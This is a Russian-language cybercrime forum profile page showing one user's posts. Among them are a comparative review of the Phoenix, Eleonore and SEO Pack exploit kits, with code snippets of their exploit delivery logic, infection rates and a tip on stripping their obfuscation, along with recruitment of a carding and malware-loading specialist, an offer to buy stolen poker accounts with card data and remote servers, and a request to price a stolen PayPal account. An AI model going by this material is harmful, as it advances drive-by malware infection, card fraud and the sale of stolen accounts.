mr.wong

Пользователи
  • Публикации

    19
  • Зарегистрирован

  • Посещение

  1. Работает все, может грузится долговато это да
  2. Наконец-то реально качественный сервис, так держать!
  3. Замечательная техподдержка, все объяснил, все рассказал
  4. Quote: Кибер сквотеры себя отлично чувствуют) osobenno volodya
  5. Skolko raz ne posilal doki, ne razu ne prohodili, vrode kachestvo
  6. Человек найден, спасибо. НЕ актуально
  7. Бесполезно, дифицит, все быстро выкупают, у тех кто может замарачиваться
  8. Сабж, разрабатывается неспешно приватный софт, ищется человек, который смог бы советовать по функциональности, по возможным путям решения тех или иных задач, а так же тестировать софт. Обязательно специалист в загрузках и кардинге. За помощь, человек получит софт и поддержку по нему абсолютно бесплатно. Вложений никаких не нужно, только иногда связка для тестовых прогрузов, ваше время и силы. Сразу скажу, софт очень перспективный Связь ПМ
  9. 76

    А мне наплели, что якобы пробив там хороший (обход фаеров) и работа как и в зевсе и ИЕ и ФФ, фейк?
  10. Благодарю за информацию!
  11. MainStream, пиши в ПМ) Scarlet, ну с карж денег боты принесут неплохой доход за счет автоматизированности. Хотя сам недопонимаю многих технических тонкостей, но могу предположить, что речь идет о возможности выигрыша или уровня доверия засчет количества сыгранных рук, или же то, что наигрынные деньги становятся более чистые для слива на подготовленные акки под вывод.
  12. У каждой связки есть свои плюсы, есть свои минусы. Я лично ковырял каждую из описанных тут связок и готов вкраце изложить. Небольшое отступление, меня не было в теме 2 года, по личным обстоятельствам работал в офлайне и совсем недавно только вернулся в тему. И вот где-то месяца 2 назад я ковырял каждую из связок, уровень значительно изменился, появились плагиновые уязвимости аля Адоб ридер, более активно стал юзаться флеш, особенно удивили показатели про Ява сплоиты, никогда бы не подумал, что они будут давать такие большие проценты! Phoenix Связка достаточно эффективная исходя из тех скринов, что я видел и рекомендаций своих знакомых. Крипт снимается простой замены eval на alert, переменные рандомные и все, никаких мусорных js инструкций нету, но выдача достаточно интересная - определяются все версии плагинов и подается поочередно сплоиты, как впрочем и должна работать нормальная связка. Выдача якобы чистой версии, на виртесте выдала Total infected: 2/38, при этом отдельные эксплоиты (pdf/jar/swf) так же палились определенными антивирусами (к сожалению логов проверки не осталось, когда чекал на тот момент). Ну вот, немного про выдачу Таким образом видим как выдается java эксплоит, ссылка на exe передается в открытом виде, что не есть хорошо Code: <body id='btypes'><applet archive='tmp/des.jar' title='help' code='dev.s.AdgredY' width='462' height='255'><param name='data' VALUE='http://******domain******/c/l.php?deserialize=87&i='/><param name='cc' value='1'/></applet> Дальше работает js код выдачиJAVASMB(); первым делом запускается эксплоит под названием JAVASMB, вероятнее всего, другое его название Java Web Start или JDT, судя по статистики по эксплоитам достаточно пробивной эксплоит Далее выполняется функция GFLASH(), очень древний флеш эксплоит не вызывающий креша браузеров Затем происходит определение версии PDF и выдача эксплоита в зависимости от версии установленного Адобе на машине жертвы Code: if (sv < 800) { addp('tmp/all.pdf'); } else if ((sv >= 800) && (sv < 931)) { addp('tmp/libtiff.pdf'); } else if ((sv >= 931) && (sv <= 932)) { addp('tmp/pdfswf.pdf'); addp('tmp/pdfopen.pdf'); } С таймаутом в 4.5 секунды запускается другой флеш эксплоит, уже более новый Code: setTimeout('FLASH10()', 4500); но данный эксплоит уже роняет браузер при наличии уязвимого флеша, но в целом работа то завершена, так что можно в некоторых случаях и уронить чужой браузер Данная выдача связки именно под плагиновые браузеры, отличные от IE, а выдача IE такая же, за исключением подачи так же доплнительно MDAC и HCP эксплоита.Админка выполнена аля домашняя страничка Васи Пупкина, не зачет в этом плане, но пробив на одном из лидирующих мест оказался, вроде наравне с Seo Pack. Отстук софта ~70% Eleonore Улыбнул тот факт, что админка связки построена на паблик шаблоне, достаточно известном, когда ее цена составляет 2к$, можно уж было потратится на уникальный дизайн,мелочь, но достаточно подпорчивает репутацию связки. К сожалению даже логов проверки выдачи не осталось. Пробив ниже чем на Фениксе на 5-7%, но тут предупрежу сразу, все очень зависит от трафика, может на другом типе и Элеонора бы уделала Феникс на пару процентов (хотя на самом деле дело все в выдаче и палевности (палевности имеется ввиду, что например на определенном трафе палится таким антивирусом, который преобладает, ну вобщем факторов может быть на самом деле много)) Отстук того же софта, что тестировался и на Фениксе ~60-65%, чуть ниже чем на Фениксе. О выдаче к сожалению сейчас ничего не могу конкретно сказать, так как не сохранилось о ней ничего! Зато по саппорту за автора Элеоноры очень хорошо отзывался один из моих хороших знакомых. Seopack Здесь совсем другая история, используется RSA шифрование, но все равно достаточно легко обламывается крипт. Большая часть переменных рандомные, остальные некоторые имеют статический вид, мусорных инструкций в коде не нашел. Здесь картина выдачи другая совсем, почему-то автор посчитал нужным сначала выполнить PDF эксплоит вызвав функцию PDF(); Далее выполняются аж 4 ява эксплоита if (JAVASMB() || || RNDVAR1() || JAVABOF() || JAVASGB() ) {} А в выдаче IE так же присутствует всеми излюбленный MS06-014 ну и HCP, хотя HCP достаточно интересная сборка, работает не только в ИЕ но и некоторых других браузерах. А про приват эксплоиты правильно высказался глубокоуважаемый Шаман, их если и продают, то уже отжатые, сняли уже люде кеш с них, и уже прямо под выпуском официального биллютеня (а за ним и патча) втюхивают дожать что еще можно с них за короткий срок за килобаксы. Впринцыпе тем, у кого есть много трафа и широкий карман, то и за пару дней можно дважды, а то и трижды и выше окупить вложение на приобретение сплоитов. P.S. Я лишь изложил свое ИМХО, в любом случае перед покупкой, советую тестировать отстук и пробив на своем трафе и на своем exe. P.P.S. Прошу не пинать, писалось на скорую руку и даже некоторые моменты по памяти. P.P.P.S. До этого складывалась такая тенденция о связках, что авторы пропадают переодически и забивают на свои продукты, но сейчас мы видем совсем другую картинку, что уже не может не радовать.
  13. В связи с предстоящим праздником НГ куплю: 2 мобильных или смарт/iphone рассмотрю любые варианты 1 ноутбук с хорошим конфигом С ценами и отзывами в ПМ
  14. Сабж, покупаю на постоянной основе. Только ПС, балансы любые за 10% от суммы на балансе, наигранные и отлежавшиеся можно договориться и дороже. Обязательно в комплекте дедик, данные сс, акк и мыло. Писать в ПМ, там выдам свои контакты.
  15. PayPal акк, Испания (ES) Баланс 2,359 EUR Estado: Verificada (то есть вериф.) Мыло на которое привязан акк имеется Подскажите пожалуйста, за сколько можно продать такой аккаунт?